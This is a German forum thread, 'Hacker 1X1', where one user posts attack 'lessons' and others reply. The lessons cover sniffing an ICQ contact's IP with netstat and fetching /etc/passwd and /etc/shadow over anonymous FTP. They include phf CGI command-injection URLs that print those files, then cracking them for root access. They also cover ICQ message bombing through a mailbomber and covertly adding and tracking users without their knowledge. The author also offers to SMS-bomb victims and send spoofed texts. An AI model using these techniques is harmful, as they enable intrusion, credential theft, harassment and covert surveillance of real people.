Hacker 1X1 [ oder, wie unsecure zum fuck bin ich ]

[Syn-Tx]

Lektion 1.

IP Adresse über ICQ sniffen:
=======================
Hey, einige von euch (inkl. mir) nutzen ICQ zum Austausch von Informationen und privaten Gesprächen.
Leider oder glücklicherweise (man nehme es wie es wolle!) kann man mit Hilfe alter DOS Befehle die IP via ICQ
auf einem ganz einfachen Weg herausbekommen.

Vielleicht denkt jetzt der ein oder andere, daß seine IP sicher sei, da er
"Do not allow others to see my IP adress" aktiviert hat.
Leider ist dem nicht so. Okay, hier folgt nun der komplette Weg den ihr gehen müsst um die IP's via ICQ zu sniffen:

* Schickt demjenigen eine Nachricht oder macht einen Chat auf, dessen IP ihr sniffen wollt
* Öffnet sofort nach dem Versand der Message unter Windows die Dos-Eingabeaufforderung und tippt ein:
cmd
Im Dosfenster dann eingeben:
netstat -a

* Nach einer Weile erhaltet ihr Informationen, die folgendermaßen aussehen können:
Beispiel:

Active Connections
Proto Local Address Foreign Address State
TCP Demon:0 0.0.0.0:0 LISTENING
TCP Demon:1029 0.0.0.0:0 LISTENING
TCP Demon:1030 0.0.0.0:0 LISTENING
TCP Demon:1090 0.0.0.0:0 LISTENING
TCP Demon:1091 0.0.0.0:0 LISTENING
TCP Demon:1098 0.0.0.0:0 LISTENING
TCP Demon:1099 0.0.0.0:0 LISTENING
TCP Demon:1093 0.0.0.0:0 LISTENING
TCP Demon:1090 server5.sys.www.ozemail.net:80 CLOSE_WAIT
TCP Demon:1091 server5.sys.www.ozemail.net:80 CLOSE_WAIT
TCP Demon:1098 server5.sys.www.ozemail.net:80 CLOSE_WAIT
TCP Demon:1099 p3-max35.auck.ihug.co.nz:1054 ESTABLISHED
TCP Demon:137 0.0.0.0:0 LISTENING
TCP Demon:138 0.0.0.0:0 LISTENING
TCP Demon:nbsession 0.0.0.0:0 LISTENING
TCP Demon:1029 0.0.0.0:0 LISTENING
TCP Demon:1093 0.0.0.0:0 LISTENING
TCP Demon:nbname 0.0.0.0:0 LISTENING
TCP Demon:nbdatagram 0.0.0.0:0 LISTENING

Wie man aus diesen Informationen herausnehmen kann, besteht eine direkte Verbindung zup3-max35.auck.ihug.co.nz:1054
Dies ist die aktuelle "Line" (also Leitung) die der User benutzt. Genau das ist es was uns interessiert.
* Tippt in der Eingabeaufforderung ein:
cmd
Im Dos Fenster dann eingeben ( nur als Beispiel )
ping p3-max35.auck.ihug.co.nz:1054

Mit dem Befehl >ping< pingt ihr den User sozusagen an und guckt ob dieser aktiv ist.
Das Ergebnis ist verblüffend und kann folgendermaßen aussehen:

Pinging p3-max35.auck.ihug.co.nz [209.76.151.67] with 32 bytes of data:
Reply from 209.76.151.67: bytes=32 time=1281ms TTL=39
Request timed out.
Reply from 209.76.151.67: bytes=32 time=1185ms TTL=39
Request timed out.
Ping statistics for 209.76.151.67:
Packets: Sent = 4, Received = 2, Lost = 2 (50% loss),
Approximate round trip times in milli-seconds:
Minimum = 1185ms, Maximum = 1281ms, Average = 616ms

Na, ihr ahnt schon etwas ? Die aktuelle IP Adresse unseres Opfers lautet: 209.76.151.67
Mehr steckt hinter einem solchen Sniffing nicht und ist doch supereinfach, oder ?
Aber habt ihr Bock jedes Mal "netstat -a" und dann noch den langen host-name anpingen ???
Nein, denn wer hat schon Lust dazu. Dann versuch mal anstatt
"netstat -a" einfach "netstat -n"
da bekommst Du eine Liste mit IP's, mit denen Du im Moment eine aktive Verbindung hast.

Und was man mit einer IP Adesse alles anfangen kann, muß ja von mir nicht weiter erläutert werden
;-)

 

[sondersonde]

oder ich schau in der outpost-firewall unter "netzwerkaktivität" unter dem icq icon nach...

sondersonde​

 

[Syn-Tx]

Lektion 2

FTP Server hacken:
================

Habt ihr nicht schon immer einmal daran gedacht wie es wäre einen FTP Server zu hacken,
sich als root uneingeschränkten Zugriff verschaffen?

Zuerst brauchen wir noch ein paar Dinge, bevor wir richtig loslegen:
* einen FTP Client (ich bevorzuge den von Windows)
* einen Password Cracker (John The Ripper)
* eine möglichst grosse Wordlist oder einen Dictionary Maker
(dieser Punkt fällt weg, wenn wir einen BruteForce Password Cracker haben)
* viel Zeit

Wenn wir all diese Dinge geklärt haben, können wir endlich loslegen ;-)
Probieren wir es zuerst mit der einfachsten Methode,
indem wir unseren FTP Client starten und eine
Verbindung zum "Opfer - FTP" herstellen. Dort versuchen wir uns nun als "anonymous" einzuloggen
und senden als Passwort eine falsche E-Mail Adresse.
Hierzu gehen wir in die DOS-Eingabeaufforderung ( Ausführen > cmd )und tippen ein (nach jeder Zeile Return drücken):

ftp
open target.com
anonymous (hier teilen wir dem Server unseren Benutzernamen mit
Bill@Microsuck.com (hier teilen wir dem Server "unsere" E-Mail Adresse mit)
get /etc/passwd (wir downloaden das file mit dem Namen passwd)
get /etc/shadow (falls die passwd nicht existiert, downloaden wir die shadow)
disconnect (trennt die Verbindung zum Server)
quit (schliesst den FTP Client)

Sollten wir hier schon Glück gehabt haben, ist der Rest ein Kinderspiel.
Wir besitzen schonmal das passwd file und müssen dieses nur noch cracken.
Dazu nehmen wir unseren Cracker und lassen ihn entweder nach der Dictionary oder Brute Force Methode das Passwort entschlüsseln.

Das Ergebnis was wir bekommen, ist das Passwort des "root" Account
(unter Novell:Supervisor; unter NT: Administrator),
mit dem wir nun wieder eine neue FTP Verbindung zu unserem Server herstellen und uns als root und dem frisch
gecrackten Passwort anmelden.

Sollten wir allerdings an der ersten Methode gescheitert sein, können wir uns einen kleinen Bug in einigen UNIX Versionen zu Nutze machen.
Hierzu benötigst du nur noch einen Webbrowser, in den du folgende Adresse eingibst:
( anstelle des www.target.com einfach den Domainnamen eintragen )
http://www.target.com/cgi-bin/phf?Qalias=x%0a/bin/cat20/etc/passwd
bzw.
http://www.target.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow

Wiederum kann es hier klappen, dass wir den Inhalt der passwd oder shadow file sehen.
Sollte dies der Fall sein, so speichern wir diese und cracken sie nur noch mit Hilfe unserer Proggies,
loggen uns als root ein und treiben nun nach belieben dort unser Spielchen auf dem FTP Server.
Es kann trotzdem geschehen, dass wir noch durch keine der beiden MethodenErfolg gehabt haben ;-(

An dieser Stelle sollten wir es mit dem Brute Force Hacking probieren. Brute Force bedeutet ganz einfach,
ALLE möglichen Kombinationen zu probieren, was sehr zeitaufwendig sein kann und wird.

TIP: UNIX Passwörter sind maximal 8 Zeichen lang !!!
So, hiermit hätten wir dann auch das Thema mit dem FTP / Website hacken abgeschlossen.
Eigentlich ist das ganze ziemlich simpel.

 

[sv_luck]

LoL ... das geht ja wirklich ^^ gerade beim kumpel ausprobiert... hab ihm dann seine IP über ICQ geschickt und er sollte nachschauen .. und sie war auch richtig ^^

 

[Syn-Tx]

Lektion 3

EMail Bomber mal ganz anders:
===================

In dieser Lesson will ich euch zeigen, was man mit seinem Mailbomber noch so alles bomben kann ;-)
wie z.B. mit lästigen ICQ Usern

Der Mailbomber den ich bevorzuge nennt sich Warfair, denn der ist super-schnell und zudem noch in Deutsch ))
Okay, fangen wir an:
Stell dir vor, das dir jemand den du über ICQ kennst, dir ziemlich auf den Sack geht.

Was tun wir also ??? Wie wäre es wenn du ihn einfach ein bischen ärgerst indem du ihm ein "paar" Messages schickst.
Solltest du es versuchen manuell zu tun, musst du eine Menge
Zeit in diese Aktion investieren.
Es gibt aber auch eine elegantere Methode indem du einfach deinen Mailbomber etwas umfunktionierst.
Du nutzt deinen Mailbomber sozusagen als ICQ Bomber ;-)

Alles was du hierfür brauchst ist ein ICQ Opfer (dessen ICQ UIN du kennen musst) und einen Mailbomber.
Trage in deinen Mailbomber als Emailadresse deines Opfers einfach ein:
ICQUIN@pager.mirabilis.com

wobei die ICQUIN die ICQ Nummer deines Opfers ist.

Nun stellst du noch die Anzahl der Messages ein, die er bekommen sollst und überlässt nun deinem Bomber die Arbeit,
die er auch promt erledigen wird ;-) So, das hätten wir.

Nun aber zu dem umgekehrten Fall: Du wirst Opfer einer solchen ICQ Attacke. Was zu tun ist ???
Eine ganz einfache Sache:

Starte dein ICQ und übernimm folgende Einstellungen:
* ICQ
* Security & Privacy
* Do not accept EmailExpress Messages

 

[Syn-Tx]

Lektion 4

ICQ User Adden ohne Erlaubnis

==============
Ihr habt euch sicherlich schon gefragt wie man über ICQ User Added, ohne dessen Erlaubnis.
Im grossen WWW exisiteren einige Crackz, die (fast) alle funktionieren und ihren Dienst tun.
Leider haben sie doch alle ein Problem: Nehmen wir mal an, ihr patcht euer ICQ mit einem dieser Crackz und added jemanden zu eurer Kontakt Liste. Ja, und wo bleibt der Haken werdet ihr euch jetzt sicher fragen.
Der Haken ist ganz einfach:
Denjenigen, den ihr geadded habt, teilt ihr (ob ihr wollt oder nicht) eine kurze System-Message mit die besagt,
das ihr ihn zu eurer Liste hinzugefügt habe. Na, ihr wisst jetzt schon was an der Sache Scheisse ist ?

Die Lösung des Problems ist ganz einfach. Downloaded euch zuerst einen dieser Crackz.
Deaktiviert ICQ, patcht ICQ und versucht einen User zu adden ohne ihn um Erlaubnis zu fragen.
Sollte dies erfolgreich geschehen, geht es nun hier weiter. Sucht nach der UIN über ICQ die Person die ihr hinzufügen wollt.
Sobald ICQ eure Anfrage positiv bestätigt, markiert den Namen der Person, indem ihr einfach auf den Namen klickt.

Und nun HALT !!!

Klickt auf keinen Fall weiter oder so einen Schrott. Nun trennt ihr eure Verbindung zum Internet.
Sollte dies erfolgreich geschehen sein, klickt nun auf "Next". Die daraus enstandene Folge ist simpel.

ICQ bombt euch nun mit Fehlermeldungen zu, die besagen, das keine Nachricht gesendet werden konnte und so einen Müll.
Aber daran werden wir uns jetzt nicht stören.
Nach dem Bestätigen der Fehlermeldungen können wir erfolgreich unser Ergebnis der Aktion sehen...
Wir haben die gewünschte Person auf unserer Contact-List, und zwar, ohne das die etwas davon mitbekommt.

Um sicher zu gehen, startet den Rechner erneut, verbindet euch dann wieder mit dem Internet.
Nun könnt ihr in vollen Zügen beobachten, wann die Person online ist, ohne das sie etwas davon merkt.
Nett, oder ???
Um die IP der Person in euren Besitz zu bringen, siehe Lektion 1

 

[sv_luck]

Mit was sich die Leute so auseinander setzen... ^^
Sind solche mail bomber eigentlich nciht illegal ?
Ich meine das sind Proggies, die ja nur dazu da sind um jemandem zu schaden...

 

[Syn-Tx]

!

Meckert da etwa einer ?
Ich will nur mal offenlegen wie unsecure ihr seit.

All diese Themen hatten wir schon mal.
Einer unserer Admins wurde mal über ICQ zugebommt.
Webseiten wurden gehackt.
Steam Accounts gestohlen.

Ich habe zwar ne icq Nummer aus Esport Gründen.
Habe ICQ aber nicht installiert und werde es auch nie benutzen.
Eher leck ich dem Teufel seinen DingdDong!

 

[Backfire!]

naja alles altbekannt und nix neues. das macht man schon seit jahren so.

EDIT: das mitm mailbomber is langweilig. vor ca 4-5 jahren gabs diese schönen sms bomber. nen text reinschreiben und ca 800 mal demjenigen aufs handy schicken. damals konnte man bei den meisten handys die sms nur einzeln löschen und ned alle auf einmal was sehr nervig sein konnte. however. spielzeug für script kiddys =(

 

[Syn-Tx]

!

Ohoo, Advanced.
Wenn de willst das was richtig läuft, selber cooden. Vor allem must Du nen freien gateaway kennen.
Ich hab daher einen, DER FUNZT.
Mit Absendenummer oder Absendenamen meiner Wahl, oder garkeine.
Gib mal Handy Nummer. Dann wirstes merken.
Wahlweise die Nummern von 2 Victims mit gewünschter Nachricht.
Kann auch gefakte sms senden.

 

[Dr.Moog]

omg! "Hacker 1X1"

da diese Methoden wohl eindeutig destriktiver Natur sind ist wohl der Begriff Cracker die bessere wahl.

Mit solchen Threads produziert man nur noch mehr nervende Script-Kiddies die, meiner Meinung nach noch nerviger sind als die Cheater die der Autor dieses **** ja leidenschaftlich gern jagt.

unglaublich^^

 

[eser127]

Original von Dr.Moog
omg! "Hacker 1X1"

da diese Methoden wohl eindeutig destriktiver Natur sind ist wohl der Begriff Cracker die bessere wahl.

Mit solchen Threads produziert man nur noch mehr nervende Script-Kiddies die, meiner Meinung nach noch nerviger sind als die Cheater die der Autor dieses **** ja leidenschaftlich gern jagt.

unglaublich^^

s/destriktiv/destruktiv

 

[Syn-Tx]

Cheater die der Autor dieses **** ja leidenschaftlich gern jagt.

Hast Du einen sitzen oder was?
Bist Du allen ernstes davon überzeugt das ich die jage? und auch noch leidenschaftlich?
Ich hab genug andere Arbeit.
Nur weil ich den RANG Anticheating habe heist das nicht das mir das Spass macht.
Ich code für BP Software zum enttarnen von cheats/cheatern da ich seit 1985/86 mit der Materie zu tun habe.
Wenn alles glatt läuft wird die an der ich gerade arbeite von steambans angewendet.
Ich würd echt mal gerne en paar stunden auf unsern Servern zocken ohne das ich andauernd Hinweisen nachgehen muss oder rummbanne.
Jeder Bann wegen cheatens bedeutet für mich 10-15 Minuten Demo rec oder view.
Die anschliessende Bannprozedur amxx der Eintrag im Forum, der Upload des Demos nochmal 5-10 Minuten
Jeder Cheater kostet mich also 15-25 Minuten meiner Freizeit.
Im Forum muss ich auch noch 1-2 Stunden jeden Tag fummeln.
Dann bin ich Leader des BP steambans.com Teams. Auch wieder 30-60 Minuten.

Lasst also solche Sprüche.

arrivaa

@Backfire!
Ich warte immer noch auf ne Mobil nummer!!!
-------
Das weisst Du, ich und noch en haufen anderer Jungs.
Der Grossteil der CS Jungs nutzen ICQ ohne sich im klaren zu sein welche Sicherheitslücke das darstellt.
Genauso auch IRC.
Über diese beiden Clientprogramme werden über 99% der Steamaccounts gestohlen.
Ich hab genug Kontakte zu dubiosen "CRACKERN" und hab schon mehr als einmal mitbekommen das eine Person 50 Accounts in einem Durchgang gerippt hat.
Die Accounts werden dann öffentlich gepostet (Accountdaten)
Wer zuerst kommt, malt zuerst und kann sich nen gerippten Account unter den nagel reissen.
Fragt erst garnet, in solch eine private Comy kommt von euch keiner rein.
Das ist bei denen einfach ausgedrückt "Sport".
Wer rippt die meisten Accounts im Monat?

 

[obernull]

Und wie kann man es schaffen, dass die IP nicht mehr angezeigt wird? Das ist ja schon ein Hammer, dass jeder die IP von einem nachschauen kann.

 

[Dr.Moog]

@syn lol, fühl dich doch nicht sofort angegriffen. schau dir dein avatar mal an, und lese dir nochmal deine beiträge durch...

komm, bist doch stolz auf deine enttarnten cheater

ausserdem gings nicht um die cheater sondern um deinen "hacker thread" lol

... manche haben einfach einen Profilierungsdrang ...

@ eser127

sry für meinen vertipper....^^

PS: nein, ich habe keinen sitzen. loool, reg dich mal auf! danke reicht

 

[Syn-Tx]

voraussgesetztDu spielst CS, benutzt ICQ oder IRC....

ich versuchs mal zu singen.......

.....! gaaaarniiichts !.....​

 

[-$T3F4N-]

kurze frage: für was soll ich jemand adden ohne das er was davon erfährt? um mich an der grünen blume aufzugeilen?

naja aber das mit der ip sniffen is ja nichts so neues
eigentlich muss ich Dr.Moog hier ziemlich zustimmen...

 

[Syn-Tx]

@syn lol, fühl dich doch nicht sofort angegriffen.
schau dir dein avatar mal an, und lese dir nochmal deine beiträge durch...komm, bist doch stolz auf deine enttarnten cheater

 

[obernull]

Ja gut, das nen ich mal eine Antwort

 

[Syn-Tx]

!

für was soll ich jemand adden ohne das er was davon erfährt?

ich versuchs mal mit pfeifen.........

Wenn ich dir was böses will, oder gar stehlen brauchst Du
1. nicht zu wissen das es mich gibt
2. soll mich nichts mit Dir in Verbindung bringen können.
3. benötige ich dafür z.B. Deine IP

Um Deine aktuelle IP unerkannt zu bekommen ist der beschriebene Weg ideal.